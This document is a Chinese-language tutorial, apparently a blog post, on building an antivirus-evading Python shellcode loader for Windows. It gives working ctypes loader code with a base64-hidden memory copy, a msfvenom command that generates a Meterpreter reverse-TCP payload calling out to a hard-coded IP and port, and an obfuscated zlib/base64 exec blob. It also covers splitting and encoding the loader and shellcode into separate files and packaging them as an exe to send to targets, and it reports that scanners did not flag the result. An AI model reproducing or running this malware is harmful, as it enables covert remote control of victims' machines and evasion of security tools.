原理
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名
shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以
思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode
实现
先将loader和shellcode都加密
loader
def shellCodeLoad(shellcode):
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
shellcode用msf生成msfvenom -p python/meterpreter/reverse_tcp LHOST=120.27.114.84 LPORT=7000 -f raw > -o shell.py
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrckGENa6q4sVhDxICKCuzcRaZNRQ9M0JFmtiv/dDVm8zPDevHnzYSY/h4TjrEZI/NuagQ99hFXLYwp7lXgyE6DXOeAFG4dD796A1pJtUJXC1yFWsSvNoiTa8CPePlzfvWx3jzdX9yzrhJqdA5UoJXUjRbMWdd2K85bwtZSSZc0QoB9RBYsCn7J5ni6iBfD0jCHblaXE3vlejZRc3hIeRQD1QVvGnuQz0t0RW4Y+340FbMFRzS7swU6f/FdPC80QLKBovltoUPPkA8RIywvEsGozqSEr+Q+JZBN/GfoDFNtfIw==')[0])))
然后对loader和shellcode分别加密存储到别的文件中(怎么加密都行但是最后要用相对应的方式解密)
shellcode加密
import base64
import sys
f = open("shellcode.txt")
t = f.read()
encoded = base64.b64encode(base64.b32encode(t.encode('UTF-8'))) #
print(encoded)
f.close()
loader加密
from base64 import b64encode
# 下面是加载器的核心函数
code = """def shellCodeLoad(shellcode):
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))"""
print(b64encode(code.encode()))
将加密的数据写入到另外的文件中,loader.txt和shellcode1.txt中
from base64 import b32decode, b64decode, b64encode
import ctypes
import base64
import py2exe
import distutils
f = open('shellcode1.txt')
code = f.read()
code = b32decode(b64decode(code))
f.close()
exec(code.decode())
f2=open('loader.txt')
loader=f2.read()
f2.close()
exec(b64decode(loader).decode())
shellCodeLoad(shellcode)
运行代码,成功上线
打包exe
现在功能实现完了,该打包了,linux可能都有python环境,但是window不一定,所以需要打包成exe文件,需要pyinstaller或者py2exe
pip install pyinstaller或
pip install py2exe
pyinstaller安装使用
py2exe安装使用
还需要手动把loader.txt和shellcode1.txt放到和exe文件一个目录,以后使用的时候就打包直接发靶机上
都可以,我测试过两种打包方法都不会报毒
结果
报毒报的是之前我打靶机时候下的exp或者别的毒
不知道什么情况,是不检测zip吗?另一个检测网站也是这样子的